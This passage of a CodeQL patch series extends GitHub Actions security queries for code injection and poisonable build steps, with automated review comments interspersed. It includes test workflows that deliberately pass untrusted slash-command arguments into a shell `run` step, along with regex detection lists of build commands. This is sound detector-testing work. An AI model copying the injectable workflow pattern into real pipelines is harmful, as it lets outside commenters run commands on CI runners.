.github/workflows/poisonable_steps.yml:27:14:27:76 | .github/workflows/poisonable_steps.yml@27:14:27:76 | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:28:9:29:6 | .github/workflows/poisonable_steps.yml@28:9:29:6 | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:28:14:28:92 | .github/workflows/poisonable_steps.yml@28:14:28:92 | +| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | .github/workflows/poisonable_steps.yml:29:9:29:43 | .github/workflows/poisonable_steps.yml@29:9:29:43 | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:29:14:29:42 | .github/workflows/poisonable_steps.yml@29:14:29:42 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | @@ -868,7 +887,7 @@ nodeLocations scopes | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | sources | ahmadnassri/action-changed-files | * | output.files | filename | manual | 
@@ -892,6 +911,7 @@ sources | khan/pull-request-comment-trigger | * | output.comment_body | text | manual | | marocchino/on_artifact | * | output.* | artifact | manual | | peter-murray/issue-body-parser-action | * | output.* | text | manual | +| potiuk/get-workflow-origin | * | output.sourceHeadBranch | branch | manual | | puppeteer/puppeteer/.github/workflows/changed-packages.yml | * | output.changes | filename | manual | | redhat-plumbers-in-action/download-artifact | * | output.* | artifact | manual | | tj-actions/branch-names | * | output.current_branch | branch | manual | @@ -902,7 +922,6 @@ sources | trilom/file-changes-action | * | output.files_removed | filename | manual | | tzkhan/pr-update-action | * | output.headMatch | branch | manual | | xt0rted/pull-request-comment-branch | * | output.head_ref | branch | manual | -| xt0rted/slash-command-action | * | output.command-arguments | text | manual | summaries | akhileshns/heroku-deploy | * | input.branch | output.status | taint | manual | | android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | manual | @@ -992,6 +1011,7 @@ summaries | timheuer/base64-to-file | * | input.fileName | output.filePath | taint | manual | | zitadel/zitadel/.github/workflows/container.yml | * | input.build_image_name | output.build_image | taint | manual | calls +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | actions/github-script | | .github/workflows/test.yml:11:9:15:6 | Uses Step | actions/checkout | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | tj-actions/changed-files | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | mad9000/actions-find-and-replace-string | diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command1.yml new file mode 100644 index 000000000000..adca4bc90ffa --- /dev/null 
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command1.yml @@ -0,0 +1,21 @@ +name: Test +on: issue_comment +permissions: + issues: write + +jobs: + test: + if: startsWith(github.event.comment.body, '/benchmark') + runs-on: benchmarks + steps: + - name: Check for Command + id: command + uses: xt0rted/slash-command-action@v2 + with: + command: benchmark + reaction-type: "eyes" + repo-token: ${{ env.GH_TOKEN }} + + - run: echo "${{ steps.command.outputs.command-arguments }}" + + diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml new file mode 100644 index 000000000000..5422ac4e9876 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/slash_command2.yml @@ -0,0 +1,21 @@ +name: Test +on: issue_comment +permissions: + issues: write + +jobs: + test: + if: startsWith(github.event.comment.body, '/benchmark') + runs-on: benchmarks + steps: + - name: Check for Command + id: command + uses: xt0rted/slash-command-action@v2 + with: + command: benchmark + reaction-type: "eyes" + repo-token: ${{ env.GH_TOKEN }} + permission-level: read + + - run: echo "${{ steps.command.outputs.command-arguments }}" + diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 16119dd6453b..6dfb91f72757 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
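Review bot: Neither fixture says why only slash_command2.yml is expected to produce a finding: slash_command1.yml omits the `permission-level` input, so under the ControlChecks change elsewhere on this page the `xt0rted/slash-command-action` step falls under the action's default (write) and is treated as a permission check, whereas slash_command2.yml sets `permission-level: read` and is the one that shows up in CodeInjectionCritical.expected. A one-line YAML comment above the `uses:` line in each file would keep that intent from being lost on the next edit, e.g. `# permission-level omitted: action defaults to write, step counts as a permission gate, no alert expected` in slash_command1.yml and `# permission-level: read does not require write access, so command-arguments remains an untrusted source` in slash_command2.yml. The same note applies to the slash_command2.yml hunk on this line.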
@@ -59,6 +59,7 @@ edges | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | provenance | | | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | provenance | | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | provenance | | +| .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | provenance | | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | provenance | | | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | provenance | | | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | provenance | | 
@@ -237,6 +238,8 @@ nodes | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | semmle.label | toJSON(github.event) | +| .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | semmle.label | Uses Step: command | +| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | semmle.label | steps.command.outputs.command-arguments | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | 
@@ -357,6 +360,7 @@ subpaths | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | ${{ toJSON(github.event) }} | +| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | ${{ steps.command.outputs.command-arguments }} | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | ${{ steps.changed.outputs.locale_files }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index d0834f0dff82..11036e7f8ebe 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -59,6 +59,7 @@ edges | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | provenance | | | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | provenance | | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | provenance | | +| .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | provenance | | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | provenance | | | .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | provenance | | | .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | provenance | | 
@@ -237,6 +238,8 @@ nodes | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | | .github/workflows/simple3.yml:20:31:20:74 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/simple3.yml:22:11:22:37 | toJSON(github.event) | semmle.label | toJSON(github.event) | +| .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | semmle.label | Uses Step: command | +| .github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | semmle.label | steps.command.outputs.command-arguments | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | From a368b797fd1c2f6e9e1e8ab1b2978570267eb584 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Jul 2024 22:39:22 +0200 Subject: [PATCH 385/707] fix(checks): Add repository control checks --- .../codeql/actions/security/ControlChecks.qll | 20 +++++++++++++++---- 1 file changed, 16 insertions(+), 4 deletions(-) diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index ec7e0ad05984..90a989c1a163 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -77,7 +77,6 @@ abstract class PermissionCheck extends ControlCheck { override boolean protectsAgainstRefMutationAttacks() { result = true } } - abstract class LabelCheck extends ControlCheck { // does it protect injection attacks but not pwn requests? // pwn requests are susceptible to checkout of mutable code 
@@ -108,7 +107,6 @@ class EnvironmentCheck extends ControlCheck instanceof Environment { } /* Specific implementations of control checks */ - class LabelIfCheck extends LabelCheck instanceof If { LabelIfCheck() { // eg: contains(github.event.pull_request.labels.*.name, 'safe to test') @@ -143,7 +141,14 @@ class RepositoryIfCheck extends RepositoryCheck instanceof If { // eg: github.repository == 'test/foo' exists( normalizeExpr(this.getCondition()) - .regexpFind(["\\bgithub\\.repository\\b", "\\bgithub\\.repository_owner\\b",], _, _) + // github.repository in a workflow_run event triggered by a pull request is the base repository + .regexpFind([ + "\\bgithub\\.repository\\b", "\\bgithub\\.repository_owner\\b", + "\\bgithub\\.event\\.pull_request\\.head\\.repo\\.full_name\\b", + "\\bgithub\\.event\\.pull_request\\.head\\.repo\\.owner\\.name\\b", + "\\bgithub\\.event\\.workflow_run\\.head_repository\\.full_name\\b", + "\\bgithub\\.event\\.workflow_run\\.head_repository\\.owner\\.name\\b" + ], _, _) ) } } @@ -174,6 +179,13 @@ class AssociationActionCheck extends AssociationCheck instanceof UsesStep { class PermissionActionCheck extends PermissionCheck instanceof UsesStep { PermissionActionCheck() { this.getCallee() = "lannonbr/repo-permission-check-action" and - not this.getArgument("permission") = ["write", "admin"] + this.getArgument("permission") = ["write", "admin"] + or + this.getCallee() = "xt0rted/slash-command-action" and + ( + // default permission level is write + not exists(this.getArgument("permission-level")) or + this.getArgument("permission-level") = ["write", "admin"] + ) } } From 59fd8530a33c914334f488b641458131b10ff6cc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Jul 2024 22:39:58 +0200 Subject: [PATCH 386/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) 
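Review bot: The new comment above `.regexpFind` in `RepositoryIfCheck` says that `github.repository` names the base repository in a `workflow_run` triggered by a pull request, yet `"\\bgithub\\.repository\\b"` stays in the list, so a condition on it still counts as a repository check in exactly the situation the comment says it does not identify the head repository. Either the comment should state that the match is deliberately permissive, e.g. `// github.repository / repository_owner are kept as weak checks: in a workflow_run triggered by a PR they name the base repo, not the fork`, or the base-repository patterns should not qualify when the enclosing trigger is workflow_run; which of the two is intended is not visible from the hunk. Note also that `regexpFind` only tests for the presence of the property name in the normalized condition, not what it is compared against, so `github.repository != 'x'` and an `||` with an unrelated term would also qualify, which is worth saying in the comment since this hunk widens the list.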
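Review bot: The two branches of the new disjunction in `PermissionActionCheck` treat a missing input differently: for `xt0rted/slash-command-action` an absent `permission-level` is accepted (the inline comment says the default is write), while for `lannonbr/repo-permission-check-action` the step only qualifies when `permission` is explicitly `"write"` or `"admin"`, so a step that omits the input is never a check. If that action also applies a default level, the first branch is inconsistent with the second; if the input is required there, a comment such as `// `permission` is a required input of this action, so there is no default case` would make the asymmetry deliberate. The flip from `not this.getArgument("permission") = ...` to `this.getArgument("permission") = ...` is a behaviour change the subject line does not mention and deserves a one-line why-comment. Both branches compare `getArgument` against string literals, so an expression-valued input (`${{ ... }}`) is presumably not recognised as a check in either; worth a note if that is intended.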
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index dd99208f5e34..554ef6bbe7f3 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
@@ -2,7 +2,7 @@ library: true
 warnOnImplicitThis: true
 name: github/actions-all
-version: 0.1.14
+version: 0.1.15
 dependencies:
 codeql/util: ^1.0.1
 codeql/yaml: ^1.0.1
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index fe02dad9c55e..e72b14fb3582 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -1,7 +1,7 @@
 ---
 library: false
 name: github/actions-queries
-version: 0.1.14
+version: 0.1.15
 groups: [actions, queries]
 suites: codeql-suites
 extractor: javascript
From 8231261ccfa8bd02c43567d51739258de74af09c Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?=
Date: Tue, 9 Jul 2024 17:28:04 +0200
Subject: [PATCH 387/707] New poisonable steps
---
 .../actions/security/PoisonableSteps.qll | 8 +-
 ql/lib/ext/config/poisonable_steps.yml | 54 +--
 .../.github/workflows/poisonable_steps.yml | 11 +
 .../library-tests/poisonable_steps.expected | 12 +-
 ql/test/library-tests/test.expected | 307 +++++++++++++-----
 5 files changed, 283 insertions(+), 109 deletions(-)
diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll
index e22662c64db3..34246fa4e8f7 100644
--- a/ql/lib/codeql/actions/security/PoisonableSteps.qll
+++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll
@@ -18,7 +18,12 @@ class PoisonableCommandStep extends PoisonableStep, Run {
 PoisonableCommandStep() {
 exists(string regexp |
 poisonableCommandsDataModel(regexp) and
- exists(this.getScript().splitAt("\n").trim().regexpFind("(^|\\b|\\s+)" + regexp, _, _))
+ exists(
+ this.getScript()
+ .splitAt("\n")
+ .trim()
+ .regexpFind("(^|\\b|\\s+)" + regexp + "(\\s|;|\\||\\)|`|-|&&|[a-zA-Z]|$)", _, _)
+ )
 )
 }
 }
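Review bot: The terminator appended to the pattern in the new `.regexpFind(...)` call in `PoisonableCommandStep` lists `[a-zA-Z]` as one alternative, which lets every data-model entry match as a bare prefix of a longer word (`make` in `makeself`, `ant` in `antlr4`, `rake` in `rakefile`), so the new right-hand guard adds little over the old unguarded form. Presumably that alternative is there for wrapper scripts such as `./mvnw` and `./gradlew` (the fixture line `xvfb-run ./mvnw clean package` depends on it); if so, `w\\b` in place of `[a-zA-Z]` keeps those and drops the arbitrary-prefix matches, or the wrapper names can be listed in the data model instead. A comment above the call naming the purpose of each alternative (backtick for command substitution, `-` for a trailing flag, the wrapper suffix) would keep the next edit from widening it further. Note that data-model entries such as `awk\\s+-f` are now spliced unescaped into this regex, so the YAML file is effectively regex source.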
@@ -41,7 +46,6 @@ class LocalScriptExecutionRunStep extends PoisonableStep, Run { LocalScriptExecutionRunStep() { exists(string line, string regexp, int group | line = this.getScript().splitAt("\n").trim() | poisonableLocalScriptsDataModel(regexp, group) and - //cmd = line.regexpCapture(".*(^|\\b|\\s+|\\$\\(|`)" + regexp + "(\\b|\\s+|;|\\)|`|$).*", group) cmd = line.regexpCapture(".*(^|;|\\$\\(|`|\\||&&)\\s*" + regexp + "\\s*(;|\\||\\)|`|-|&&|$).*", group) diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index 56ba567aa455..f9274f54872d 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -2,7 +2,6 @@ extensions: - addsTo: pack: github/actions-all extensible: poisonableActionsDataModel - # source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L16 # source: https://boostsecurityio.github.io/lotp/ data: - ["pre-commit/action"] 
@@ -14,40 +13,46 @@ extensions:
 - addsTo:
 pack: github/actions-all
 extensible: poisonableCommandsDataModel
- # source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L23
 # source: https://boostsecurityio.github.io/lotp/
 data:
- - ["ant "]
- - ["bundle "]
- - ["cargo "]
- - ["checkov "]
- - ["eslint "]
- - ["go generate"]
- - ["go run"]
- - ["gomplate "]
- - ["gradle "]
- - ["java -jar"]
- - ["make "]
+ - ["ant"]
+ - ["awk\\s+-f"]
+ - ["bundle"]
+ - ["cargo"]
+ - ["checkov"]
+ - ["eslint"]
+ - ["gcloud\\s+builds submit"]
+ - ["golangci-lint"]
+ - ["gomplate"]
+ - ["goreleaser"]
+ - ["gradle"]
+ - ["java\\s+-jar"]
+ - ["make"]
+ - ["mdformat"]
 - ["mkdocs"]
 - ["msbuild"]
 - ["mvn"]
 - ["mypy"]
- - ["npm [a-z]"]
- - ["pnpm [a-z]"]
+ - ["(p)?npm\\s+[a-z]"]
 - ["pre-commit"]
 - ["prettier"]
- - ["pip install -r"]
- - ["pip install --requirement"]
+ - ["phpstan"]
+ - ["pip\\s+install\\s+-r"]
+ - ["pip\\s+install\\s+--requirement"]
 - ["poetry"]
 - ["pylint"]
 - ["pytest"]
- - ["rake "]
- - ["rails db:create"]
- - ["rails assets:precompile"]
- - ["rubocop "]
- - ["terraform "]
+ - ["rake"]
+ - ["rails\\s+db:create"]
+ - ["rails\\s+assets:precompile"]
+ - ["rubocop"]
+ - ["sed\\s+-e"]
+ - ["sed\\s+-f"]
+ - ["stylelint"]
+ - ["terraform"]
 - ["tflint"]
- - ["yarn "]
+ - ["yarn"]
+ - ["webpack"]
 - addsTo:
 pack: github/actions-all
 extensible: poisonableLocalScriptsDataModel
@@ -59,5 +64,6 @@ extensions:
 - ["(node)\\s+(.*)(\\.js|\\.ts)", 3]
 - ["(python)\\s+(.*)\\.py", 3]
 - ["(ruby)\\s+(.*)\\.rb", 3]
- - ["(go)\\s+(.*)\\.go", 3]
+ - ["(go)\\s+(generate|run)\\s+(.*)\\.go", 4]
+ - ["(dotnet)\\s+(.*)\\.csproj", 3]
 
diff --git a/ql/test/library-tests/.github/workflows/poisonable_steps.yml b/ql/test/library-tests/.github/workflows/poisonable_steps.yml
index 7be32ca5c17a..37ec9c9ff716 100644
--- a/ql/test/library-tests/.github/workflows/poisonable_steps.yml
+++ b/ql/test/library-tests/.github/workflows/poisonable_steps.yml
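Review bot: Dropping `go generate` and `go run` from `poisonableCommandsDataModel` and re-adding them only in `poisonableLocalScriptsDataModel` as `(go)\\s+(generate|run)\\s+(.*)\\.go` narrows coverage: `go generate ./...` and `go run .`, the usual package forms, do not end in `.go` and now match neither model, while the fixture only exercises `go run foo.go`. Keeping `- ["go\\s+(generate|run)"]` in the commands model next to the new local-script entry restores the previous detection without losing the file capture. The entries are also now regex fragments rather than literal prefixes (`\\s+`, `(p)?npm`), which the surviving `# source:` comment does not say; a line such as `# entries are regex fragments spliced into PoisonableCommandStep's pattern; escape regex metacharacters` would warn the next editor.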
@@ -27,3 +27,14 @@ jobs:
 - run: ruby scripts/generate_theme.rb --outfile js/storybook/theme.css
 - run: bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css
 - run: xvfb-run ./mvnw clean package
+ - run: echo "foo" && npm i && echo "bar"
+ - run: echo "foo" | npm i | echo "bar"
+ - run: echo "foo" | npm i | echo "bar"
+ - run: echo "foo `npm i` bar"
+ - run: dotnet test foo/Tests.csproj -c Release
+ - run: go run foo.go
+ - run: sed -i "s|git_branch = .*|git_branch = \"$GITHUB_HEAD_REF\"|" config.json # not supported yet
+ - run: sed -f ./config.sed file.txt > foo.txt
+ - run: sed -f config file.txt > foo.txt
+ - run: echo "foo" | awk -f ./config.awk > foo.txt
+ - run: gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo
diff --git a/ql/test/library-tests/poisonable_steps.expected b/ql/test/library-tests/poisonable_steps.expected
index dc6b863d0b93..55105c39bdfa 100644
--- a/ql/test/library-tests/poisonable_steps.expected
+++ b/ql/test/library-tests/poisonable_steps.expected
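Review bot: Two of the added fixture lines are identical (`- run: echo "foo" | npm i | echo "bar"` appears twice), so the second adds no coverage and only shifts the line numbers in the `.expected` files; one of them could instead exercise a case the new terminator is meant to reject, such as a word that merely starts with an entry. The last added line, `gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo`, has an unterminated double quote; it is harmless to the regex match but reads as a paste error, and closing it (`...="COMMIT_SHA=foo"`) keeps the fixture valid shell. The `# not supported yet` marker on the `sed -i` line would be clearer if it said what is unsupported, e.g. `# sed -i with an inline script is not matched; only sed -e / sed -f are modelled`, assuming that is the reason it is excluded from the expected output.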
@@ -17,4 +17,14 @@ | .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | | .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | -| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | +| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index c80dc006ce7a..08f9136f2e50 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected 
@@ -6,20 +6,20 @@ files workflows | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | reusableWorkflows compositeActions jobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | localJobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/poisonable_steps.yml:5:5:29:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | extJobs 
@@ -63,7 +63,18 @@ steps | .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | | .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | -| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | +| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | 
@@ -109,7 +120,18 @@ runSteps | .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | python scripts/generate_theme.py --outfile js/storybook/theme.css | | .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:29:9:29:43 | Run Step | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | xvfb-run ./mvnw clean package | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | echo "foo" && npm i && echo "bar" | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | echo "foo" \| npm i \| echo "bar" | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | echo "foo `npm i` 